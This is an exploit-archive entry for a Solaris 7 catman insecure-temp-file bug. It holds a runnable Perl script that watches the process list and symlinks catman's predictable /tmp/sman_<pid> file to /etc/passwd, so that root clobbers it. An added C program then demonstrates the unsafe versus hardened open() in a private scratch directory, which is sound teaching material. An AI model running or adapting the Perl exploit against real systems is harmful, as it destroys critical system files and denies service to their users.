SunOS 5.7 Catman - Local Insecure tmp Symlink Clobber

EDB-ID: 235

Author: lwc

Type: dos

Platform: Solaris

Date: 2000-12-20


#!/usr/local/bin/perl -w
#
# The problem is that catman creates files in /tmp
# insecurely. Their names are based on the PID of the
# catman process, and catman will happily clobber
# any file that is symlinked from that name.
# The idea of this script is to watch the process
# list for the catman process, get its PID and create
# a symlink in /tmp to the file we want clobbered.
# This exploit depends on system speed and process
# load. It worked on a patched Solaris 2.7 box (August
# 2000 patch cluster):
# SunOS rootabega 5.7 Generic_106541-12 sun4u
# sparc SUNW,Ultra-1 lwc@vapid.betteros.org
# 11/21/2000   Vapid Labs.
# http://vapid.betteros.org

use strict;

# File to be clobbered: catman, running as root, truncates and
# overwrites whatever /tmp/sman_<pid> points at.
my $clobber = "/etc/passwd";

# Poll the process list until a catman process appears. The -v greps
# drop the grep processes themselves and the ps column header line.
while (1) {
  open(my $ps, '-|', 'ps -ef | grep -v grep | grep -v PID')
    or die "cannot run ps: $!";
  while (my $line = <$ps>) {
    # ps -ef columns: UID PID PPID C STIME TTY TIME CMD
    my @args = split ' ', $line;
    if ($line =~ /catman/) {
      my $pid = $args[1];
      print "Symlinking sman_$pid to $clobber\n";
      symlink($clobber, "/tmp/sman_$pid")
        or warn "symlink failed: $!";
      exit(1);
    }
  }
  close($ps);
}
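The header comment describes the underlying bug: a temporary file whose name is predictable (sman_<pid>) and an open() that follows whatever symlink an attacker has planted at that name. The C program below is an added illustration, not part of the original exploit and not taken from catman's source. It reproduces the unsafe open pattern beside a hardened one (O_CREAT|O_EXCL|O_NOFOLLOW, which is what mkstemp() does under the hood) inside a scratch directory created with mkdtemp() that stands in for /tmp, and reports whether the victim file survived. The file names, the victim contents and the simulate_clobber helper are constructed for the demo; it assumes a modern POSIX/Linux libc rather than Solaris 7.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* The pattern the advisory describes: a predictable name built from the
 * PID, opened with O_TRUNC and nothing to stop symlink traversal. If an
 * attacker has planted /tmp/sman_<pid> -> /etc/passwd first, the
 * privileged process truncates /etc/passwd and writes its own data there. */
static int open_tmp_unsafe(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
}

/* Hardened form: O_EXCL makes open() fail with EEXIST if anything already
 * exists at the path (POSIX requires this even for a planted symlink),
 * O_NOFOLLOW refuses to traverse a symlink as the final component, and
 * 0600 keeps the file private. Pair this with an unpredictable name
 * (mkstemp) so the attacker cannot guess where to plant the link. */
static int open_tmp_safe(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Constructed scenario in a private scratch directory standing in for /tmp:
 * "target" plays the role of /etc/passwd, "sman_<pid>" is the attacker's
 * planted symlink. Returns 1 if the target was clobbered, 0 if it survived,
 * -1 on setup failure. *open_errno receives errno from the victim's open()
 * (0 when the open succeeded). */
int simulate_clobber(int hardened, int *open_errno)
{
    static const char secret[] = "root:x:0:0:root:/:/sbin/sh\n";   /* constructed */
    static const char payload[] = "formatted man page\n";          /* constructed */
    const char *base = getenv("TMPDIR");
    char dir[PATH_MAX], target[PATH_MAX], planted[PATH_MAX];
    struct stat st;
    int fd, clobbered;

    snprintf(dir, sizeof dir, "%s/catman_demo_XXXXXX", base ? base : "/tmp");
    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(target, sizeof target, "%s/target", dir);
    snprintf(planted, sizeof planted, "%s/sman_%d", dir, (int)getpid());

    /* Victim file with known contents. */
    fd = open(target, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0 || write(fd, secret, sizeof secret - 1) != (ssize_t)(sizeof secret - 1)) {
        if (fd >= 0) close(fd);
        unlink(target); rmdir(dir);
        return -1;
    }
    close(fd);

    /* Attacker wins the race: the name the victim will use already points
     * at the file to be destroyed. */
    if (symlink(target, planted) != 0) {
        unlink(target); rmdir(dir);
        return -1;
    }

    /* Victim process now creates its work file. */
    errno = 0;
    fd = hardened ? open_tmp_safe(planted) : open_tmp_unsafe(planted);
    if (open_errno)
        *open_errno = (fd < 0) ? errno : 0;
    if (fd >= 0) {
        (void)write(fd, payload, sizeof payload - 1);
        close(fd);
    }

    /* Did the victim file keep its original size? */
    clobbered = (stat(target, &st) != 0 || st.st_size != (off_t)(sizeof secret - 1));

    unlink(planted);
    unlink(target);
    rmdir(dir);
    return clobbered;
}

int main(void)
{
    int e = 0;
    printf("unsafe open:   target clobbered = %d\n", simulate_clobber(0, &e));
    printf("hardened open: target clobbered = %d (open failed: %s)\n",
           simulate_clobber(1, &e), e ? strerror(e) : "no error");
    return 0;
}
```

Compile with `cc -o catman_demo catman_demo.c` and run as an unprivileged user; the first line reports the clobber, the second shows the hardened open being refused with EEXIST (or ELOOP on systems that check O_NOFOLLOW first) and the victim file intact.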


# milw0rm.com [2000-12-20]